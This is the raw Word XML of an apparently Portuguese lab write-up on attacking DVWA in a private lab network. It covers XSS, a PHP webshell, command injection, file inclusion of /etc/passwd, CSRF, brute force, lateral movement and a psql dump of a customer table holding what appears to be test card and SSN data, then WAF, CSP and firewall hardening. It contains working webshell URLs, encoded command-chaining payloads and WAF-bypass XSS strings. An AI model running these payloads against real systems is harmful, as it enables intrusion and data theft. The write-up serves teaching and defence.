        <w:t xml:space="preserve">E para testar isso vamos colocar dentro da querystring </w:t>
      </w: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Dito e feito, ao colocarmos o payload o XSS foi triggado.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UPLOAD</w:t>
        <w:tab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vamos para a vulnerabilidade de file upload onde é possível fazer upload de arquivos dentro do site criando assim uma web shell ou triggando uma vulnerabilidade como um XSS, no caso vamos subir uma webshell em PHP porque o site é em PHP. Dentro do repositório a webshell vai estar dentro de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evidence/stage06/payloads/webshell.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">caso queira acessar para validar o script.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55372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upload foi realizado com sucesso! Agora vamos acessar e rodar o seguinte comando</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/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http://172.30.10.5:8080/hackable/uploads/webshell.php?cmd=whoami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E ele vai retornar.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 Injection</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">A vulnerabilidade de command injection permite usar o navegador da página para enviar comandos arbitrários dentro do servidor e descobrir informações sobre ele, como por exemplo.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5549900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Inclusion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vulnerabilidade permite que você use o backend e as permissões dele para decidir qual arquivo php carregar e executar, se o valor não foi validado é possível executar comandos para tentar pegar conteúdo que não deveria como por exemplo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../../../../../../etc/passwd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8128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Ao rodar o comando o output retorna informações que não deveria.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CSRF</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Esse ataque ele é um pouco diferente ele usa a sessão do usuário contra ele mesmo confiando demais no navegador e nos seus tokens de sessão, para explorar essa vulnerabilidade vamos criar um HTML e rodar na seção local da minha máquina como ele confia no token do navegador a senha vai ser trocada automaticamente.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isso devemos abrir esse cara no navegador</w:t>
      </w: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E quando você clica ele confia no token do navegador e altera a senha do usuário final.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Brute Force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brute force é uma técnica utilizada para invadir contas quando não há um rate limit para login ou querys é possível tentar brutar contas ou conseguir buscar dados por via de muitas requisições. Nesse caso vou usar o Burp Intruder para fazer esse brute force. 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realizar esse ataque estou usando duas wordlists que estão disponíveis no diretório e também estou usando o Burp Intruder onde o mesmo estou colocando essas duas wordlists e o tipo de ataque Cluster Bomb.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ao rodar esse scan nós conseguimos ver que o usuário e senha corretos são </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin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hacked123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Weak ID</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Essa vulnerabilidade é basicamente uma falha na validação da requisição do usuário, podemos pegar e mudar o número do token sequencial para conseguir pegar a requisição de outro usuário como se fosse nossa porque não tem validação e é sequencial.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Requisição vítima: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Requisição atacante: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concluir agora vamos aprofundar o nosso ataque, já exploramos diversas vulnerabilidades e fizemos o command e control com o webshell .php. O primeiro passo é ver se funciona o movimento lateral, para isso vamos rodar o comando.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Esse comando mostra que através da web shell dentro do dvwa conseguimos alcançar o nosso objetivo, o app-api que não tínhamos acesso.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Agora vamos roubar a credencial do banco de dados, para isso vamos rodar o seguinte comando.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6350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para conseguir alcançar a base de dados nós vamos no navegador com a nossa web shell funcionando e pesquisar o seguinte arquivo:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/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://172.30.10.5:8080/hackable/uploads/webshell.php?cmd=php%20-r%20%22echo%20file_get_contents%28%27http%3A//172.30.20.10%3A8000/internal/net-check%3Fhost%3D127.0.0.1%253B%2520psql%2520postgresql%253A//appuser%253AS3nh4_D0_Lab_2026%2540172.30.30.10%253A5432/labdb%2520-c%2520%2527SELECT%2520%252A%2520FROM%2520customers%2527%25202%253E%25261%27%29%3B%22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Com isso ele vai nos trazer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{"cmd":"ping -c 1 -W 1 127.0.0.1; psql postgresql://appuser:S3nh4_D0_Lab_2026@172.30.30.10:5432/labdb -c 'SELECT * FROM customers' 2&gt;&amp;1","output":"PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.\n64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.043 ms\n\n--- 127.0.0.1 ping statistics ---\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\nrtt min/avg/max/mdev = 0.043/0.043/0.043/0.000 ms\n id |    name     |      email       |     credit_card     |     ssn     \n----+-------------+------------------+---------------------+-------------\n  1 | Alice Silva | alice@corp.local | 4111 1111 1111 1111 | 123-45-6789\n  2 | Bruno Costa | bruno@corp.local | 5500 0000 0000 0004 | 987-65-4321\n  3 | Carla Souza | carla@corp.local | 3400 0000 0000 009  | 456-78-9012\n(3 rows)\n\n"}</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">E com isso vamos ter acesso a todo o resto do conteúdo.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 base em tudo isso agora vamos partir para a correção, o primeiro passo é realizar o Block no WAF dessas vulnerabilidades.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">WAF em blocking</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Vamos colocar o SecRuleEngine para On e vamos passar a bloquear as requisições, para testar em primeiro lugar vamos executar o comando </w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">try { (Invoke-WebRequest "http://172.30.10.5:8080/?id=1%20UNION%20SELECT%20user%20FROM%20users").StatusCode } catch { "BLOQUEADO -&gt; " + $_.Exception.Response.StatusCode.value__ }</w:t>
        <w:br w:type="textWrapping"/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318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 bloqueando o WAF agora para tentar bypassar o controle vamos usar um duplo encode e encode simples.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9906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vamos testar o bloqueio do XSS</w:t>
      </w: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ver na requisição que houve a tentativa de XSS e o bloqueio.Vamos tentar então bypassar o WAF com o seguinte payload http://172.30.10.5:8080/vulnerabilities/xss_d/?default=x#&lt;script&gt;alert(document.domain)&lt;/script&gt;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Passou.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isso ativamos o CSP e com isso a correção foi aplicada.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Agora vamos fazer o hardening por elo.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Hardening por elo</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">O mais importante nessa etapa é corrigir o movimento lateral, o maior problema hoje é que a regra F1 hoje deixa qualquer host da DMZ (172.30.10.0/24) falar com a app-api. Foi por isso que seu webshell no DVWA (172.30.10.10) conseguiu pular pra APP. Mas pensa: quem legitimamente precisa falar com a app-api? Só o WAF (172.30.10.5) — o DVWA não tem motivo nenhum pra isso.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mitigação:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> restringir F1 pra aceitar </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">só o WAF como origem</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, não a DMZ inteira. Aí o DVWA comprometido </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perde</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> o caminho pra APP — o movimento lateral morre.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18.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://172.30.10.5:8080/hackable/uploads/webshell.php?cmd=whoami" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14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172.30.10.5:8080/login.php" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13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image" Target="media/image9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://172.30.10.5:8080/hackable/uploads/webshell.php?cmd=php%20-r%20%22echo%20file_get_contents%28%27http%3A//172.30.20.10%3A8000/internal/net-check%3Fhost%3D127.0.0.1%253B%2520psql%2520postgresql%253A//appuser%253AS3nh4_D0_Lab_2026%2540172.30.30.10%253A5432/labdb%2520-c%2520%2527SELECT%2520%252A%2520FROM%2520customers%2527%25202%253E%25261%27%29%3B%22" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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